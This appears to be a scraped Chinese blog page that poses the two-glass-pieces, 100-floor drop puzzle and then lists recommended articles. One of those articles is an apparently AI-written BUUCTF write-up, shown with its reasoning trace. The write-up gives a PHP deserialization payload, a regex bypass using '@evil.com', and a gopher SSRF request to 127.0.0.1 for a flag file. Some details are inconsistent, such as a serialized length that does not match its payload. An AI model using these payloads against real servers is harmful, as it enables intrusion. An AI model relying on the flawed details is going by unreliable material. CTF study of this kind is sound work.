一道有意思的题目

最新推荐文章于 2025-03-24 22:16:41 发布
原创 最新推荐文章于 2025-03-24 22:16:41 发布 · 119 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

探讨在一栋100层的大厦中,如何使用两个相同的玻璃围棋子找出从哪一层开始投掷会摔碎的最佳策略。这是一个经典的数学谜题。
有一幢100层高的大厦,给你两个完全相同的玻璃围棋子。假设从某一层开始,丢下玻璃棋子就会摔碎。那么怎么利用手中的两颗棋子,用一种什么样的最优策略,知道这个临界的层高呢?
ctf+管理员登录+php,一道有意思的CTF题目
weixin_28224217的博客
03-20 2487
前言近期在整理题目的时候,发现了一道质量不错的Web题,出自2019 TMCTF Final,特此记录一下。信息搜集题目描述:Hack the following server.http://10.0.106.(team number)/User NamePasswordguestpasswordadmin(Unknown)Note: You do not have to use way of b...
分享一道有意思题目
mathematicians的博客
02-21 463
给你N个数的。询问:该序列中是否存在个数能构成三角形。数据范围:每个数,输入格式:第一行输入M,表示M次询问;接下来M行,每行第一个数字为N,表示数字个数,接下来输入N个数输出共M行,如果存在则输入1,否则输入0。
记录一道有意思题目
qq_49422880的博客
04-19 1693
图片里能拿到二维码,解码出来是一串base64的字符,进行解码得到很多对话。 另外一张图片末尾有一段附加的base64数据,拿出解码是很多段的文字。 前面那个刚好16句对应0-F,然后代替后面的即可。 orgintxt = ['有一个人前来买瓜','哥们儿这瓜多少钱一斤啊两块钱一斤','这瓜皮是金子做的还是瓜粒子是金子做的','你瞧瞧现在哪儿有瓜呀这都是大棚的瓜','你嫌贵我还嫌贵呢','这瓜保熟吗','我开水果摊的能卖给你生瓜蛋子' ,'我问你这瓜熟吗','你是故意找茬儿是不是你要不要吧','你
一道有意思的javascript题目
Cy19901215的博客
02-21 220
前几天在网上看到一道有意思的js题目,大家可以自己动手看看结果。 var i=0;function ab(){ alert(i); var i=2; alert(i); i=9; alert(i);}ab();alert(i); 上面alert太多?那就再简化一下,比较一下下面两个结果 var i=999; function ab(){...
一道有意思题目(2025 polarctf web 狗黑子CTF变强之路)
naichuan88的博客
03-24 929
所以,我猜测这里可能是文件包含,所以使用PHP的filter伪协议去读取文件,但有一个问题就是为我们不知道去读取哪一个文件,可以使用Dirsearch或者使用随波逐流去扫描(这里我使用的是随波逐流没有的可以去下面官网看看)好了,接着讲常规的方法,分析了代码发现回导向一个文件,我们直接再次包含(有可能有人会问为什么不直接账号密码登录,因为我试过了发现没有任何信息)这是解码出来的信息,看样子要我们去拼接得到关键信息,然后看见gou7是base64编码的样子,尝试解码得到信息。这是解出来的内容中的关键信息。
一道比较有意思题目
m0_72164003的博客
12-27 197
现有一个2行13列的棋盘,棋盘上的任意一个位置可以向他临近的8个位置移动(即上、下、左、右、左上、右上、左下、右下)。棋盘上的每一个位置的标号由一个大写的英文字母表示。 现在给你一个移动的顺序,这个顺序用27个大写的英文字母表示,其中只有一个字母出现了两次。 问你是否存在一个合法的设置棋盘标号的方案,使得从这个棋盘的某个位置出发,能够得到这个走法的顺序。
一道有意思题目
Creabine的博客
11-30 364
昨天遇到了一道题目,一开始没解出来,后来再大佬的提示下做出来了。记录在这里。 题目 // 给定一个数组 arr,数组中的每个元素形式是 { id: 0, parent: 0, // 指向数组中的另一个元素 body: "xxx" } data: [ { id: 0, parent: 1, body: "wefw" }, { id: 1, body: "sdwe" }, ...
一道有意思的JavaScript 题目
weixin_34269583的博客
08-21 154
今天在网上看到一道题,觉得很有意思就把它抄下来解了。题目是这样的: 1 function Parent() { 2 this.a = 1; 3 this.b = [1, 2, this.a]; 4 5 this.c = { demo: 5 }; 6 ...
记录一道有意思的js题目
weixin_30607029的博客
05-21 192
偶然机会,在codewars上面开始做题,遇到一道有意思题目,记录一下: 题目是这样的: In this kata, you will write a function that returns the positions and the values of the "peaks" (or local maxima) of a numeric array. For example, the...
一道有意思题目之Integer
只是一只程序媛
11-01 305
今天在公众号上看到一道有点意思的题目
一道有意思的C++题
10-03
题目来源于一个有趣的背景故事,其中提到“蛐蛐儿”和“yyy同学”之间的互动。虽然这是一个趣味性的设定,但实际考察的是算法设计能力。 #### 题目描述 题目要求找出一组数据中的众数,即出现频率超过一半的数字。...
一道有意思的JAVA机试题
03-27
1. **树形数据结构**:题目中的图A展示了树状结构,其中每个节点都有一个标题、ID以及一个上级节点ID(upid)。在计算机科学中,树是一种非线性的数据结构,由节点(或顶点)和边(或连接)组成,其中每个节点可能有...
基于GEC6818平台的五子棋人机对战系统设计与实现
11-25
五子棋作为一种广为人知的策略性棋盘游戏,其基本规则易于掌握。在选定人机对战模式后,由程序执黑先行,用户执白应对。双方依次在棋盘上落子,任何一方在横向、纵向或斜向形成连续五个或更多同色棋子即获胜。 项目资源涵盖多个技术领域的程序代码,涉及前后端开发、移动终端应用、操作系统、智能系统、物联网技术、信息管理系统、数据存储方案、硬件设计、大数据处理、教学资料、多媒体处理及网站构建等多个方向。具体技术实例包括嵌入式平台如STM32与ESP8266,编程语言如PHP、QT、C++、Java、Python、C#,系统开发如Linux与iOS,以及电子设计自动化工具和实时操作系统等。 主要技术栈包含服务端开发语言Java、Python及Node.js,后端框架Spring Boot与Django,前端技术React、Angular与Vue,界面设计框架Bootstrap与Material-UI,数据库系统MySQL、PostgreSQL和MongoDB,缓存工具Redis,以及容器化部署方案Docker与Kubernetes。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
lv_0_20251125195629.mp4
11-25
lv_0_20251125195629.mp4
numpy、pandas、sklearn、pytorch等数据分析工具的一些使用技巧
11-25
NumPy数组操作实战技巧 numpy、pandas、sklearn、pytorch等数据分析工具的一些使用技巧
中国Cassandra数据库用户组开源社区项目-专注于Apache-Cassandra分布式NoSQL数据库技术研究与实践-提供技术文档下载与源码解析-集成Titan图数据库与Lu.zip
最新发布
11-25
Buffer内存管理实战技巧中国Cassandra数据库用户组开源社区项目_专注于Apache_Cassandra分布式NoSQL数据库技术研究与实践_提供技术文档下载与源码解析_集成Titan图数据库与Lu.zip中国Cassandra数据库用户组开源社区项目_专注于Apache_Cassandra分布式NoSQL数据库技术研究与实践_提供技术文档下载与源码解析_集成Titan图数据库与Lu.zip
图像处理基于电磁学优化算法的多阈值分割算法研究(Matlab代码实现)
11-25
【图像处理】基于电磁学优化算法的多阈值分割算法研究(Matlab代码实现)内容概要:本文研究基于电磁学优化算法(Electromagnetism-like Optimization, EMO)的多阈值图像分割方法,并通过Matlab代码实现。该方法借鉴电磁学中电荷间相互作用的机制,将图像分割问题转化为优化问题,利用EMO算法搜索最优阈值组合,以最大化分割效果的评价指标(如Otsu法或多级别熵)。文中详细介绍了EMO算法的基本原理、实现步骤及其在图像多阈值分割中的具体应用流程,展示了该算法能够有效避免传统方法易陷入局部最优的问题,从而获得更精确的分割结果。; 适合人群:具备图像处理基础知识和Matlab编程能力的高校学生、科研人员及工程技术人员。; 使用场景及目标:①解决复杂背景下图像的多目标分割问题,提升医学影像、遥感图像等领域的分割精度;②学习智能优化算法(如EMO)在图像处理中的实际应用,为研究新型分割算法提供技术参考和实现范例。; 阅读建议:在学习过程中应结合Matlab代码,深入理解EMO算法的寻优机制与图像分割评价函数的构建方法,建议自行调试不同参数对分割效果的影响,以加深对算法性能的理解。
DriverBooster12pro
11-25
DriverBooster12pro
buuctf 一道有趣的题目wp
10-15
<think>嗯,用户想查找BUUCTF平台上的一道有趣题目的解题思路(wp)。这个问题需要结合用户提供的多个引用内容来回答,这些引用涵盖了Misc、RE、Crypto、Web等多个方向的题目解法片段。 首先注意到用户特别强调了"有趣"这个关键词。根据提供的引用内容,几个题目类型都挺有意思的:引用1提到Brainfuck和Ook语言加解密,引用2是迷宫题,引用5是个简单的栈溢出题。其中引用3的robots协议泄露源码题目比较特殊,涉及PHP反序列化和SSRF漏洞利用,解题过程包含较多安全知识点,而且包含了源码分析、正则绕过、SSRF利用等层层递进的技巧。 准备从引用3的robots题目入手。引用3详细提供了源码内容,需要完整分析漏洞点:UserInfo类构造函数有参数注入风险;isValidBlog()方法使用正则校验URL格式,但容易被绕过;get()方法存在SSRF漏洞。解题思路可以分四步:访问robots.txt获取备份文件→分析源码→构造POP链→绕过URL验证读取flag。 还考虑在回答中补充两个相关问题:一个是关于正则绕过的变体思考,另一个是SSRF防御措施。这样既能满足用户获取解题思路的需求,又能延伸相关知识点。 最后检查引用标记的使用。在提到robots泄露时会引用[^3],在设计POP链利用SSRF时也会引用该源码内容。这样既保持了回答专业性,又确保所有引用来源都有明确标注。 </think>以下是BUUCTF中一道**设计巧妙且综合性较强**的题目(基于引用[3]的Web类题目)的完整解题思路: --- ### 题目:robots协议与PHP反序列化(Web类) #### 解题思路 **1. 发现源码泄露** 访问网站根目录下的 `robots.txt`,发现提示文件: ```http User-agent: * Disallow: /user.php.bak ``` 下载 `user.php.bak` 获取源码(引用[3])。 **2. 分析源码漏洞** 关键代码: ```php class UserInfo { public $name, $age, $blog; // ... public function getBlogContents() { return $this->get($this->blog); // 触发SSRF } public function isValidBlog() { return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $this->blog); } } ``` - **漏洞点1**:`isValidBlog()` 正则过滤可绕过(如 `http://127.0.0.1:80@evil.com` 会被解析为访问127.0.0.1)。 - **漏洞点2**:`getBlogContents()` 方法通过cURL发起请求,存在**SSRF(服务端请求伪造)**。 **3. 构造POP链利用反序列化** 目标:通过反序列化控制 `$blog` 属性,利用SSRF读取内网flag。 - 触发点:搜索源码中 `unserialize()` 的调用位置(题目通常通过Cookie、POST参数传入序列化数据)。 - 构造Payload: ```php <?php class UserInfo { public $blog = "gopher://127.0.0.1:80/_GET%20/flag.txt%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0A%0D%0A"; } echo serialize(new UserInfo); // 输出:O:8:"UserInfo":1:{s:4:"blog";s:58:"gopher://...";} ``` **4. 绕过URL正则校验** - 利用 `@` 符号混淆域名解析: `$blog = "http://127.0.0.1:80@example.com";` 正则校验通过,但cURL实际访问 `127.0.0.1:80`。 - 使用 `0://` 协议绕过(需环境支持): `$blog = "0://127.0.0.1:80/flag";` **5. 获取Flag** 将生成的序列化字符串提交至服务端(如通过Cookie),触发SSRF访问内网 `flag.txt`,响应中包含Flag。 --- ### 🔍 为什么此题有趣? 1. **多层知识点融合**: - robots协议 → 源码泄露 → 反序列化 → 正则绕过 → SSRF → 内网渗透 2. **经典漏洞组合**: 反序列化+SSRF是CTF Web题的常见套路,但结合URL解析特性设计绕过增加了挑战性。 3. **贴近实战**: 类似漏洞曾出现在真实CMS中(如Typecho反序列化漏洞CVE-2018-18753)。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值